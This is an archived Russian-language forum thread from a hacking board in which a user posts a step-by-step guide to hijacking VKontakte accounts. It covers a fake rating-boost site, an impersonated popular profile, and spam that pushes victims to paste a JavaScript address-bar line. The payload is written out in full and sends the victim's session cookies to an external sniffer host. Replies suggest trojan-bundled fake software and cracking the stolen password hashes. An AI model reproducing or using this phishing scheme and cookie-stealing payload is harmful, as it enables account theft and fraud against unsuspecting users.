ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

25.08.2009, 01:00
|
|
Новичок
Провел на форуме: 73459
|
|
я так понял что при вставке этого кода, должна пойти анимация как бы повышающегося рейтинга да ? ..или просто появиться табличка ?
|
|
|

|
|
Постоянный
Провел на форуме: 128470
|
|
Привет всем я Pantoderm и это моя первая статья так что не судите строго. Хотел бы поделиться с вами своим способом угона акков от популярной социальной сети Вконтакте.ру Для этого нам понадобиться (как и с фейком ) бесплатный хостинг , и парочка замечательных скриптов для поднятия рейтинга и повышения голосов( я их опубликую немного позже) . И так приступим =)
1)Сначало зарегистрируем себе сайт , сайт какой нибудь фирмы салидной , но о которой некто нечего не знает. Думаю с этим проблем не будет.
2) убираем с сайта всё кроме главное страницы , и делаем там рекламму . у меня за 10 минут получилось примерно такое http://reyting.wmsite.ru/ .
Лично я регал на http://www.webstolica.ru/ потому что вконтакте не выдаёт что эта ссылка ведёт на фришенговый сайт .
2.1) для хорошей рекламы нам понадобиться мажорик с большим рейтингом и ОТКРЫТОЙ СТРАНИЦЕЙ , что бы все могли заходить и смотреть что это правда. Для того что бы найти его мы заходим в группу где можно приглашать и нажимаем расширенный поиск ---- поиск и все у кого большой рейтинг идут первыми вот и выбирайте кого будем копировать
Что бы снять виде о подтверждении что скрипты работают мы зарегистрируем двойника этого мажорика . как это делать думаю объяснять не надо.
3)идём на раздачу халявных акков вконтакте берём и начинаем немного спамить
p/s что бы сорвать побольше акков нужно обязательно дописать « что бы рейтинг закрепился пригласите на сайт ещё 10 друзей» ну или сколько душе угодно =) только смотрите не переборщите
теперь объясняю суть идеи :
жертва заходит на сайт и видит что это бесплатный рейтинг , но её это настораживает специально для этого мы делаем отвод глаз и пишем что рейтинг не совсем бесплатный его получают за просмотр рекламы ,тогда жертва успакаеваться и спокойно вставляет скрипт , но скрипт с незаметной дороботкой а точнее с javascript :document.write('img = new Image(); img.src = "http://httpz.ru/nr7gif758k8.gif?"+document.cookie;') - это скрипт для адрессной строки со сниффера на .hacker-pro.net зарание замаскированным на тут потому что есть народ который знает про это и начинают портить всю малину . и когда наша жертва вставляет «волшебный» скрипт то о чудо на её странице рейтинг начинает подниматься ! в это время куки от контакта идут нам на сниффер в папку ЛОГ (для тех кто не знает ) . всё мы идём туда копирует remixpass а точнее то что стоит после знака равно = и расшифроввываем на онлайн расшифровщиках
теперь скрипты я их не стал выкладывать их сюда потому что народу много ходит я их залью а вы скачаете.
вот впринцепи и всё спасибо за внимание с вами был начинающий хакер Pantoderm так же хочу выразить благодарность Uxta .
смотрите внимательно куда вставлять JavaScript код для адресной строки
там всё написанно Скачать скрипты
специально для hacker-pro.net
пароль на архив со скриптами
Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
всем удачи и если статека понравилась не скупитесь ставить плюс и спасибо
|
|
|

|
|
Участник форума
Провел на форуме: 70801
|
|
Молорик, половину можно было заХАЙДить....ИМХО.
|
|
|

|
|
Постоянный
|
|
Цитата:
Сообщение от t0xA
Мне понравилось, можно еще запихать фейковые проги аля поднимаем рейтинг, фековый софт вобщем, в кукках есть трабла в том что MD5 трудно расшифровать... Или софт со склееным трояном!
да можно было бы желание . но я привёл пример сайта деловой фирмы которая дат рейтинг за просмотр рекламмы . и мне кажется что на проги мало кто ведёться а вот со скриптами можно ещё поработать ))
Цитата:
Сообщение от KpeBeDbI4
Молорик, половину можно было заХАЙДить....ИМХО.
я пытался но чёт не получаеться (
|
|
|

|
|
Участник форума
Провел на форуме: 70801
|
|
Цитата:
Сообщение от pantoderm
я пытался но чёт не получаеться (
о_О" хайд походу убрали, я вообще найти не могу.
|
|
|

|
|
Постоянный
|
|
Цитата:
Сообщение от QwE43
а чтобы не парится с регистрацией новвого акка можно просто полоску рейтинга изменить :wink:
тоже верно но все знают про программу фотошоп . так что многие уйдут )) а видео доказывает что скрипт работает )
|
|
|

|
|
Новичок
Провел на форуме: 590386
|
|
|
|
|

|
|
Постоянный
|
|
Цитата:
Сообщение от Uxta
Молодец.
Только писал ты её конечно не совсем сам, вижу что чёто и от себя добавил, но суть с*****нул отсюда http://11rus-team.ru/forum/showthread.php?t=36
это даже видно по скринам которые делал я сам лично)
блин извини чесное слово не знал об этом зуб даю )) а статью я сам писал с нуля отвечаю а скрины для сайта не буду врать взял у тебя ))
|
|
|

|
|
Новичок
Провел на форуме: 590386
|
|
Цитата:
блин извини чесное слово не знал об этом зуб даю )) а статью я сам писал с нуля отвечаю
Ну да, и скрины загадочным образом у тебя такие же да? и с коментами теме же на них?))
Короче не гони. Пох*й, запостил и запостил.
|
|
|

|
|
Постоянный
|
|
Цитата:
Сообщение от Uxta
Ну да, и скрины загадочным образом у тебя такие же да? и с коментами теме же на них?))
Короче не гони.
да признаюсь картинку взяты у тебя , что бы не терять времени на сайте . так что извини меня за это. я честное слово не знал про твою статью . а за то что ты натолкнул меня на написание статьи я выразил тебе благодарность в конце
|
|
|
|
 |
|
|